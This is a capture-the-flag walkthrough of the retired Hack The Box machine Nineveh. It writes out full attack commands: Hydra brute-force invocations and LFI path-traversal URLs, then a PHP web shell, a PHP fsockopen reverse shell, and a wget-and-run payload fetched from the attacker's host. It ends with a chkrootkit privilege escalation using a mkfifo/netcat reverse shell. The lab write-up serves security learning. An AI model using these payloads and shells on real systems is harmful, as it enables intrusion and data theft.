Hackthebox.eu - Retired - Nineveh

Hackthebox.eu - Retired - Nineveh

Recon

I start with a simple UP/Down scan on all TCP ports.

Nmap -T4 -p- -oX ./nmapb.xml nineveh.htb

Then I convert the output to HTML to make it easy  to ready

Xsltproc ./nmapb.xml -o ./nmapb.html

Looks like just port 80 and 443 are open. A webserver

Let’s run nmap again with the -A switch to run all the scripts against just these two ports

Nmap -T4 -p80,443 -A -oX ./nmapf.xml nineveh.htb

Then convert that to HTML too

Xsltproc ./nmapf.xml -o ./nmapf.html

Looks like we have Apache 2.4.18 running on an ubuntu server

Let’s browse 80 and 443 to see what it serves up.

80

SSL/ Port 443

Here is the cert info for ssl

Not much help there.

Let’s start to scan these websites and see if we can find something, We will be searching against both ports since they could have different files being served.

I’ll start with Nikto on port 80

Nikto -h http://nineveh.htb

Info.php is available which is a default apache page that gives a lot of info on the webserver.

It also looks like it might be vulnerable to RFI(Remote File Inclusion)

Dirb on port 80 gave us just some default results

Info.php which we already know about from nikto, index.html the default web page and server-status which we aren’t allowed to view

Dirbuster found http://nineveh.htb/department/

Dirb on port 443 gave another location  https://nineveh.htb/db

phpLiteAdmin 1.9

Dirb and Nikto didn’t give me anything else to go on for a password here so we are going to to move over to exploit and try to brute force this login page using Hydra

Exploit

https://tools.kali.org/password-attacks/hydra

Hyrda is a brute force tool that can be used to attack things like websites,ftp and a bunch of other things. It has a lot of different switches and it took me a good 20 minutes to get all my settings right in order for this attack to work.

Before we can get to hydra we need to look at the login to get the parameters we need to feed into hydra.

So Let’s fire up burp and capture a failed login attempt

Here is the screenshot of failed login attempt

We need to gather the highlighted information to give to Hyrda.

We need to know the site we want hydra to attack, what the things being passed to the website are and what a  failed response looks like

So here is the final command we are going to issue to hydra. I’ll break it down a little further.

hydra -P /usr/share/wordlists/rockyou.txt nineveh.htb http-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect"   -S -l ''

Let’s walk through all the switches here.

-P this switch indicates that we are going to use a password list 

Nineveh.htb this is the domain we are attacking

Http-post-form this is the type of request being used 

"/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" this is the total command lets’ break it down 

/db/index.php this is the actually login page

password=^PASS^ ^PASS^ is the variable the hydra will use our word list for

&remember=yes&login=Log+In&proc_login=true

These are the other parameters the website is expecting

:Incorrect This is the failed login message we get

-S indicates the site uses SSL

-l ‘’ supplying nothing for use name

Looks like our password is  password123

not quite admin/admin but pretty damn close

Cool we are logged in now.

Let’s go back and run hydra against that department login too

Just like before let’s capture the login in burp so we know what to feed hydra

I’m just going to assume there is a user named admin

hydra -P /usr/share/wordlists/rockyou.txt nineveh.htb http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -l "admin"

Eventually we got back 1q2w3e4r5t as the password for admin

After we log in we get

Here is notes section

Looky there, it's calling a file to display ninevehNotes.txt  let's see if we can use this for some LFI

I started with just removing the files portion

http://nineveh.htb/department/manage.php?notes=ninevehNotes.txt

Next i tried changing the file to /etc/passwd

http://nineveh.htb/department/manage.php?notes=../../../../etc/passwd

Ok let's add files/ninevehnots.txt back but still with the /etc/passwd

http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.txt/../../../../etc/passwd

Hmm that is a different error, this one seems more like an apache error than the other error of no note selected. I suspect that there is some sort of if statement behind this looking for maybe the ninevehnotes part… because if it's not there we get the generic no note selected error but get the apache error.

Lets try it again but take the files part out again.

http://nineveh.htb/department/manage.php?notes=/ninevehNotes.txt/../../../../etc/passwd

That worked so we do have some LFI here in the department page.

Ok now back to phpliteadmin There is an exploit that I found that we could use to execute some php that we create in a DB.. Now for brevity I didn't include all my failed attempts to get this to work. but I can assure you they were numerous and very time consuming

https://www.exploit-db.com/exploits/24044

So I created a DB name ninevehNotes.php (for the pesky filter)

I’m going to create table named shell

Then we will follow along with the exploit verbatim to see POC here.

I created a text field named shell with <?php phpinfo()?>

So it creates the DB in the /var/tmp/ directory which is not visible to the internet… damnit

But we did find the LFI on the department site hopefully we can leverage that to call the php maybe?

http://nineveh.htb/department/manage.php?notes=/var/tmp/ninevehNotes.php

Cool,cool,cool,cool we were able to lfi our php “db”

Let's modify it again and see if we can get some talking from the box.

I’m just going to attempt to have it ping back to me first to make sure it allows outbound connections.

<?php exec('ping -c4 10.10.14.18')?>

I’ll update the value to be this new php

Then I setup a listener on my machine

Tcpdump -i tun0 -n icmp

Then refresh the notes page

Ok now we just need to modify this to hopefully do a shell session back instead of a ping.

Ok we are going to use python to create php variable that we can pass to the system directly

<?php echo system($_REQUEST["cmd"]); ?>

So now if we just add &cmd=*** after our URL it should execute whatever we put there  as www-data

http://nineveh.htb/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=ls

I fought with just trying to execute a reverse shell using the “db” php and couldn’t get it running

Eventually I hosted a php on my machine and used the db php to download and execute it.

My shell php call circusmonkey.php

<?php $sock=fsockopen("10.10.14.18",5555);exec("/bin/sh -i <&3 >&3 2>&3");?>

Then I inserted this code into the db to download and execute my php

<?php system("wget http://10.10.14.18:8000/circusmonkey.php -O /tmp/circusmonkey.php; php /tmp/circusmonkey.php"); ?>

Setup a listener on my box

Nc -lvp 5555

Ok we finally have a foothold

Lets use python3 to ge a little better shell here

python3 -c 'import pty; pty.spawn("/bin/bash")'

Poking around in the www folder I found a folder called secure_notes.

There is simply an HTML page that displays a png  and the png file..

I browsed to that site and see this

Let’s download this png and see if there is some more to it than meets the eye

I ran strings against it 

Strings ./nineveh.png

And found some interesting output

That sure looks like their private key for ssh.. Which would be great if ssh was open

But wait ssh is open, just not to the internet….

So we should be able to use his private key we found to ssh into localhost as armois

I made a file called key.txt on my kali box and used SimpleHTTPServer to download it to nineveh

ssh -i ./key.txt amrois@localhost   ( don’t forget to chmod to tighten the rights to the file or ssh will complain  chmod 600 ./key.txt)

Lets get that hash yo

Next I used my existing SimpleHTTPServer to downloads linpeas.sh to nineveh

What is this?

A script to delete text files in /report

I did a cat on all the files in the directory

Looks like the output of a program that is looking for root kits?

I grabbed one line and googled it

This was among the top results

https://forums.linuxmint.com/viewtopic.php?t=274218

Looks like a program called chkrootkit

Googling around a vulnerability in this program I found this

https://lepetithacker.wordpress.com/2017/04/30/local-root-exploit-in-chkrootkit/

Apparently if we place a file called update in the /tmp directory it will execute as root when the program is run

Considering the reports are being deleted every minute, I’m guessing the chkrootkit is running on the same schedule, even though I didn't see it in the cron jobs... something else must be running it

So as a POC i’m just going to make a executable that reads /root/root.txt and copy to a directory  I can read

My update

cat /root/root.txt > /tmp/circusmonkey2/root.txt

I placed the file in the /tmp directory and gave it executable rights

Chmod +x ./update

Then checked my output folder

There we got our hash but what about a root shell? It should be trivial now that we have found this exploit.

Well looks like I figured out why my tires with netcat weren’t working when trying to get a foothold

But mkfifo seems to work fin

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.18 3333 >/tmp/f

So let’s update our update to have this instead

Wait for the chkrootkit to run

Much better.

This box was a dooozy, one of more difficult ones i’ve done lately